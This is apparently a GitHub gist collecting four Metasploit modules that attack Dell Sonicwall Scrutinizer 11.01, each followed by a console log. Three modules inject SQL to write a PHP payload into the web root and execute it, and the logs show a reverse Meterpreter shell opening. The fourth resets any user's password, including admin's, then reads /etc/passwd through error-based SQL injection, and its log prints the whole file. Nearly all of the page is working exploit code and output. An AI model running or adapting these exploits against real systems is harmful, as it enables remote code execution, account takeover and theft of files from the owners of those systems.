Forked from brandonprry/scrutinizer_changeunit_sqli_exec.rb
Created
July 10, 2014 17:17
-
-
Save johnjohnsp1/cfcd26c415aa4cee25c3 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This module requires Metasploit: http//metasploit.com/download | |
## | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpClient | |
include Msf::Exploit::FileDropper | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution", | |
'Description' => %q{ | |
Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows | |
an attacker to write arbitrary files to the file system. This vulnerability is used | |
to write a PHP script to the file system to gain RCE. | |
This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => [], | |
'References' => [], | |
'Platform' => ['php'], | |
'Arch' => ARCH_PHP, | |
'Targets' => [['Dell Sonicwall Scrutinizer 11.01', {}],], | |
'Privileged' => false, | |
'DisclosureDate' => "", | |
'DefaultTarget' => 0)) | |
register_options( | |
[ | |
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]), | |
OptString.new('USERNAME', [ false, "The username to authenticate as"]), | |
OptString.new('PASSWORD', [ false, "The password to authenticate with" ]) | |
], self.class) | |
end | |
def exploit | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'), | |
'vars_get' => { | |
'name' => datastore['USERNAME'], | |
'pwd' => datastore['PASSWORD'] | |
} | |
}) | |
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/ | |
sessionid = $2 | |
cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{$1}" | |
hexstr = ("<?php " + payload.encoded + " ?>").bytes.map { |b| sprintf("%02x",b) }.join | |
post = { | |
'ti' => 1, | |
'limit' => 25, | |
'page' => 0, | |
'order' => '', | |
'dir' => 'DESC', | |
'bbp' => 'percent', | |
'changeUnit' => '', | |
#should be trivial to support windows, just change the paths | |
'user_id' => "-9513 OR 9319=9319 LIMIT 0,1 INTO OUTFILE '/home/plixer/scrutinizer/html/d4d/#{sessionid}.php' LINES TERMINATED BY 0x#{hexstr}" | |
} | |
register_files_for_cleanup("/home/plixer/scrutinizer/html/d4d/#{sessionid}.php") | |
send_request_cgi({ | |
'uri' => normalize_uri(target_uri, '/d4d/exporters.php'), | |
'method' => 'POST', | |
'vars_post' => post, | |
'cookie' => cookie | |
}) | |
send_request_cgi({ 'uri' => normalize_uri(target_uri, "/d4d/#{sessionid}.php")}) | |
end | |
end | |
__END__ | |
msf exploit(scrutinizer_sqli_exec) > show options | |
Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
PASSWORD passw0rd! no The password to authenticate with | |
Proxies no Use a proxy chain | |
RHOST 192.168.1.99 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI / yes Base Application path | |
USERNAME username no The username to authenticate as | |
VHOST no HTTP server virtual host | |
Exploit target: | |
Id Name | |
-- ---- | |
0 Dell Sonicwall Scrutinizer 11.01 | |
msf exploit(scrutinizer_sqli_exec) > exploit | |
[*] Started reverse handler on 192.168.1.31:4444 | |
[*] Sending stage (39195 bytes) to 192.168.1.99 | |
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600 | |
meterpreter > shell | |
Process 3038 created. | |
Channel 0 created. | |
id | |
uid=48(apache) gid=48(apache) groups=48(apache),500(plixer) | |
uname -a | |
Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This module requires Metasploit: http//metasploit.com/download | |
## | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpClient | |
include Msf::Exploit::FileDropper | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution", | |
'Description' => %q{ | |
Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows | |
an attacker to write arbitrary files to the file system. This vulnerability is used | |
to write a PHP script to the file system to gain RCE. | |
This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => [], | |
'References' => [], | |
'Platform' => ['php'], | |
'Arch' => ARCH_PHP, | |
'Targets' => [['Dell Sonicwall Scrutinizer 11.01', {}],], | |
'Privileged' => false, | |
'DisclosureDate' => "", | |
'DefaultTarget' => 0)) | |
register_options( | |
[ | |
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]), | |
OptString.new('USERNAME', [ false, "The username to authenticate as"]), | |
OptString.new('PASSWORD', [ false, "The password to authenticate with" ]) | |
], self.class) | |
end | |
def exploit | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'), | |
'vars_get' => { | |
'name' => datastore['USERNAME'], | |
'pwd' => datastore['PASSWORD'] | |
} | |
}) | |
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/ | |
sessionid = $2 | |
cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{$1}" | |
hexstr = ("<?php " + payload.encoded + " ?>").bytes.map { |b| sprintf("%02x",b) }.join | |
post = { | |
'methodDetail' => "-6045 UNION ALL SELECT NULL,NULL,NULL,0x#{hexstr},NULL,NULL,NULL," + | |
"NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL " + | |
"INTO DUMPFILE '/home/plixer/scrutinizer/html/d4d/#{sessionid}.php'#" | |
} | |
register_files_for_cleanup("/home/plixer/scrutinizer/html/d4d/#{sessionid}.php") | |
send_request_cgi({ | |
'uri' => normalize_uri(target_uri, '/d4d/exporters.php'), | |
'vars_get' => post, | |
'cookie' => cookie | |
}) | |
send_request_cgi({ 'uri' => normalize_uri(target_uri, "/d4d/#{sessionid}.php")}) | |
end | |
end | |
__END__ | |
msf exploit(scrutinizer_sqli_exec) > show options | |
Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
PASSWORD passw0rd! no The password to authenticate with | |
Proxies no Use a proxy chain | |
RHOST 192.168.1.99 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI / yes Base Application path | |
USERNAME username no The username to authenticate as | |
VHOST no HTTP server virtual host | |
Exploit target: | |
Id Name | |
-- ---- | |
0 Dell Sonicwall Scrutinizer 11.01 | |
msf exploit(scrutinizer_sqli_exec) > exploit | |
[*] Started reverse handler on 192.168.1.31:4444 | |
[*] Sending stage (39195 bytes) to 192.168.1.99 | |
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600 | |
meterpreter > shell | |
Process 3038 created. | |
Channel 0 created. | |
id | |
uid=48(apache) gid=48(apache) groups=48(apache),500(plixer) | |
uname -a | |
Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This module requires Metasploit: http//metasploit.com/download | |
## | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Auxiliary | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpClient | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "Dell Sonicwall Scrutinizer Authenticated Arbitrary User Password Change and File Read", | |
'Description' => %q{ | |
Dell Sonicwall Scrutinizer 11.01 is vulnerable to an arbitrary user password change vuln | |
and a SQL injection as an admin user during account creation allows for the reading | |
of arbitrary files. | |
This module exploits both vulns to go from a user with lesser privileges to changing | |
the admin user's password, then logging in as admin to exploit the SQLi and read | |
an arbitrary specified file. Tested on a CentOS box, should work on windows as well. | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => [], | |
'References' => [], | |
'Targets' => [['Dell Sonicwall Scrutinizer 11.01', {}],], | |
'Privileged' => false, | |
'DisclosureDate' => "", | |
'DefaultTarget' => 0)) | |
register_options( | |
[ | |
OptString.new('FILENAME', ['false', 'The file to read from the admin sqli', '/etc/passwd']), | |
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]), | |
OptString.new('USERNAME', [ false, "The username to authenticate as"]), | |
OptString.new('PASSWORD', [ false, "The password to authenticate with" ]), | |
OptInt.new('USERID', [true, "The ID of the user to have their password changed. 'admin' is always 1.", 1]) | |
], self.class) | |
end | |
def run | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'), | |
'vars_get' => { | |
'name' => datastore['USERNAME'], | |
'pwd' => datastore['PASSWORD'] | |
} | |
}) | |
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/ | |
sessionid = $2 | |
cookie = "cookiesenabled=1; sessionid=#{sessionid}; userid=#{$1}" | |
post = { | |
'tool' => 'userprefs', | |
'savePrefs' => datastore['USERID'], | |
'othersTop' => 'true', | |
'graphType' => 'step', | |
'hostDisplayType' => 'DNS', | |
'language' => 'english', | |
'skin' => 'retro-sonicwall', | |
'unit' => 'percent', | |
'tab' => 'tab1', | |
'defaultMap' => '0', | |
'flowTopn' => '10', | |
'statusOption' => 'conversations', | |
'email' => 'undefined', | |
'interval' => "1m", | |
'ibOb' => 'inbound', | |
'srcDst' => 'src', | |
'alarmsTopn' => '50', | |
'statusTopn' => '25', | |
'statusRefresh' => '5', | |
'statusViewDeflt' => 'topInterfaces', | |
'defMailRep' => 'esoTopConversationsCount', | |
'Timezone' => 'Automatic', | |
'savePass' => 'passw0rd!', | |
'useLdap' => '0', | |
'defFlowalyzRep' => 'availability', | |
'readonly' => '0' | |
} | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri, '/cgi-bin/admin.cgi'), | |
'method' => 'POST', | |
'vars_post' => post, | |
'cookie' => cookie | |
}) | |
if res.code == 500 | |
fail_with("Error updating user's password. Check your credentials") | |
end | |
print_good ("Log in with the user's name and the password 'passw0rd!'") | |
if datastore['USERID'] == 1 && datastore['FILENAME'] != '' | |
print_good("Attempting to read file using 'admin' account: " + datastore['FILENAME']) | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'), | |
'vars_get' => { | |
'name' => 'admin', | |
'pwd' => 'passw0rd!' | |
} | |
}) | |
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/ | |
sessionid = $2 | |
cookie = "cookiesenabled=1; sessionid=#{sessionid}; userid=#{$1}" | |
hexstr = datastore['FILENAME'].bytes.map { |b| sprintf("%02x",b) }.join | |
i = 0 | |
file = '' | |
while true | |
post = { | |
'tool' => 'userprefs', | |
'newUser' => 'fdsafdsa', | |
'pwd' => 'passw0rd!', | |
'selectedUserGroup' => "2 AND (SELECT 3835 FROM(SELECT COUNT(*),CONCAT(0x716b6b7171,(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{hexstr})) AS CHAR),0x20)),#{(50*i)+1},50)),0x717a7a7571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" | |
} | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri, '/cgi-bin/admin.cgi'), | |
'method' => 'POST', | |
'vars_post' => post, | |
'cookie' => cookie | |
}) | |
res.body =~ /qkkqq(.*)qzzuq1/ | |
break if $1 == '' | |
part = $1.scan(/(..)/).map{|a| a.first.to_i(16).chr}.join | |
file << part | |
i+=1 | |
print_good("#{i}. #{part}") | |
end | |
print_good(file) | |
end | |
end | |
end | |
__END__ | |
msf auxiliary(scrutinizer_password_change) > show options | |
Module options (auxiliary/gather/scrutinizer_password_change): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
FILENAME /etc/passwd yes The file to read from the admin sqli | |
PASSWORD passw0rd! no The password to authenticate with | |
Proxies no Use a proxy chain | |
RHOST 192.168.1.99 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI / yes Base Application path | |
USERID 1 yes The ID of the user to have their password changed. 'admin' is always 1. | |
USERNAME username no The username to authenticate as | |
VHOST no HTTP server virtual host | |
msf auxiliary(scrutinizer_password_change) > run | |
[+] Log in with the user's name and the password 'passw0rd!' | |
[+] Attempting to read file using 'admin' account: /etc/passwd | |
[+] 1. root:x:0:0:root:/root:/bi | |
[+] 2. n/bash | |
bin:x:1:1:bin:/bin | |
[+] 3. :/sbin/nologin | |
daemon:x:2 | |
[+] 4. :2:daemon:/sbin:/sbin/nol | |
[+] 5. ogin | |
adm:x:3:4:adm:/var/a | |
[+] 6. dm:/sbin/nologin | |
lp:x:4:7 | |
[+] 7. :lp:/var/spool/lpd:/sbin/ | |
[+] 8. nologin | |
sync:x:5:0:sync:/ | |
[+] 9. sbin:/bin/sync | |
shutdown:x | |
[+] 10. :6:0:shutdown:/sbin:/sbin | |
[+] 11. /shutdown | |
halt:x:7:0:halt | |
[+] 12. :/sbin:/sbin/halt | |
mail:x: | |
[+] 13. 8:12:mail:/var/spool/mail | |
[+] 14. :/sbin/nologin | |
uucp:x:10: | |
[+] 15. 14:uucp:/var/spool/uucp:/ | |
[+] 16. sbin/nologin | |
operator:x:1 | |
[+] 17. 1:0:operator:/root:/sbin/ | |
[+] 18. nologin | |
games:x:12:100:ga | |
[+] 19. mes:/usr/games:/sbin/nolo | |
[+] 20. gin | |
gopher:x:13:30:gopher | |
[+] 21. :/var/gopher:/sbin/nologi | |
[+] 22. n | |
ftp:x:14:50:FTP User:/v | |
[+] 23. ar/ftp:/sbin/nologin | |
nobo | |
[+] 24. dy:x:99:99:Nobody:/:/sbin | |
[+] 25. /nologin | |
vcsa:x:69:69:vir | |
[+] 26. tual console memory owner | |
[+] 27. :/dev:/sbin/nologin | |
rpc:x | |
[+] 28. :32:32:Rpcbind Daemon:/va | |
[+] 29. r/cache/rpcbind:/sbin/nol | |
[+] 30. ogin | |
rpcuser:x:29:29:RPC | |
[+] 31. Service User:/var/lib/nfs | |
[+] 32. :/sbin/nologin | |
nfsnobody: | |
[+] 33. x:65534:65534:Anonymous N | |
[+] 34. FS User:/var/lib/nfs:/sbi | |
[+] 35. n/nologin | |
sshd:x:74:74:Pr | |
[+] 36. ivilege-separated SSH:/va | |
[+] 37. r/empty/sshd:/sbin/nologi | |
[+] 38. n | |
plixer:x:500:500::/home | |
[+] 39. /plixer:/bin/bash | |
ntp:x:3 | |
[+] 40. 8:38::/etc/ntp:/sbin/nolo | |
[+] 41. gin | |
dbus:x:81:81:System m | |
[+] 42. essage bus:/:/sbin/nologi | |
[+] 43. n | |
haldaemon:x:68:68:HAL d | |
[+] 44. aemon:/:/sbin/nologin | |
apa | |
[+] 45. che:x:48:48:Apache:/var/w | |
[+] 46. ww:/sbin/nologin | |
rtkit:x: | |
[+] 47. 499:498:RealtimeKit:/proc | |
[+] 48. :/sbin/nologin | |
pulse:x:49 | |
[+] 49. 8:497:PulseAudio System D | |
[+] 50. aemon:/var/run/pulse:/sbi | |
[+] 51. n/nologin | |
mysql:x:27:27:M | |
[+] 52. ySQL Server:/var/lib/mysq | |
[+] 53. l:/bin/bash | |
tcpdump:x:72: | |
[+] 54. 72::/:/sbin/nologin | |
[+] root:x:0:0:root:/root:/bin/bash | |
bin:x:1:1:bin:/bin:/sbin/nologin | |
daemon:x:2:2:daemon:/sbin:/sbin/nologin | |
adm:x:3:4:adm:/var/adm:/sbin/nologin | |
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | |
sync:x:5:0:sync:/sbin:/bin/sync | |
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown | |
halt:x:7:0:halt:/sbin:/sbin/halt | |
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin | |
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin | |
operator:x:11:0:operator:/root:/sbin/nologin | |
games:x:12:100:games:/usr/games:/sbin/nologin | |
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin | |
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin | |
nobody:x:99:99:Nobody:/:/sbin/nologin | |
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin | |
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin | |
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin | |
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin | |
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin | |
plixer:x:500:500::/home/plixer:/bin/bash | |
ntp:x:38:38::/etc/ntp:/sbin/nologin | |
dbus:x:81:81:System message bus:/:/sbin/nologin | |
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin | |
apache:x:48:48:Apache:/var/www:/sbin/nologin | |
rtkit:x:499:498:RealtimeKit:/proc:/sbin/nologin | |
pulse:x:498:497:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin | |
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash | |
tcpdump:x:72:72::/:/sbin/nologin | |
[*] Auxiliary module execution completed | |
msf auxiliary(scrutinizer_password_change) > | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This module requires Metasploit: http//metasploit.com/download | |
## | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpClient | |
include Msf::Exploit::FileDropper | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution", | |
'Description' => %q{ | |
Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows | |
an attacker to write arbitrary files to the file system. This vulnerability is used | |
to write a PHP script to the file system to gain RCE. | |
This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => [], | |
'References' => [], | |
'Platform' => ['php'], | |
'Arch' => ARCH_PHP, | |
'Targets' => [['Dell Sonicwall Scrutinizer 11.01', {}],], | |
'Privileged' => false, | |
'DisclosureDate' => "", | |
'DefaultTarget' => 0)) | |
register_options( | |
[ | |
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]), | |
OptString.new('USERNAME', [ false, "The username to authenticate as"]), | |
OptString.new('PASSWORD', [ false, "The password to authenticate with" ]) | |
], self.class) | |
end | |
def exploit | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'), | |
'vars_get' => { | |
'name' => datastore['USERNAME'], | |
'pwd' => datastore['PASSWORD'] | |
} | |
}) | |
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/ | |
sessionid = $2 | |
cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{$1}" | |
hexstr = ("<?php " + payload.encoded + " ?>").bytes.map { |b| sprintf("%02x",b) }.join | |
post = { | |
'xcNetworkDetail' => "-7230 UNION ALL SELECT NULL,0x#{hexstr},NULL,NULL INTO DUMPFILE '/home/plixer/scrutinizer/html/d4d/#{sessionid}.php'#" | |
} | |
register_files_for_cleanup("/home/plixer/scrutinizer/html/d4d/#{sessionid}.php") | |
send_request_cgi({ | |
'uri' => normalize_uri(target_uri, '/d4d/exporters.php'), | |
'vars_get' => post, | |
'cookie' => cookie | |
}) | |
send_request_cgi({ 'uri' => normalize_uri(target_uri, "/d4d/#{sessionid}.php")}) | |
end | |
end | |
__END__ | |
msf exploit(scrutinizer_sqli_exec) > show options | |
Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
PASSWORD passw0rd! no The password to authenticate with | |
Proxies no Use a proxy chain | |
RHOST 192.168.1.99 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI / yes Base Application path | |
USERNAME username no The username to authenticate as | |
VHOST no HTTP server virtual host | |
Exploit target: | |
Id Name | |
-- ---- | |
0 Dell Sonicwall Scrutinizer 11.01 | |
msf exploit(scrutinizer_sqli_exec) > exploit | |
[*] Started reverse handler on 192.168.1.31:4444 | |
[*] Sending stage (39195 bytes) to 192.168.1.99 | |
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600 | |
meterpreter > shell | |
Process 3038 created. | |
Channel 0 created. | |
id | |
uid=48(apache) gid=48(apache) groups=48(apache),500(plixer) | |
uname -a | |
Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment